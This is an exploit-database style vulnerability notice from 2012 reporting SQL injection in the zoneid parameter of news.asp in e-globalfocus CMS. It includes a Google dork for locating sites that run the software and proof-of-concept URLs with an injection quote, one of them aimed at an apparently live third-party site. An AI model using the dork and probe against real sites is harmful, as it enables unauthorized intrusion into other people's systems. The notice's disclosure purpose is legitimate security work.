E-GlobalFocus CMS suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
6098a64b4a7ad7ac9aeb6bef9d0b23c8174f5448995524b9fe5a6bb1cc9cc2e0
###################################################################################
# Exploit Title: e-globalfocus cms Sql Injection Vulnerability
#
# Google Dork: intext:"Web design by www.e-globalfocus.com"
#
# Date: 08/24/2012
#
# Author: Crim3R
#
# Vendor Home : www.e-globalfocus.com
#
# Tested on: all
#
###################################################################################
========================================
zoneid parametr in news.asp file is Vulnerable to sql injection
D3M0 :
http://demo2.eglobalfocus.com/ptm/news.asp?zoneid=7'
http://www.mbipv.net.my/news.asp?zoneid=7'
===============Crim3R@Att.Net===========
$home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir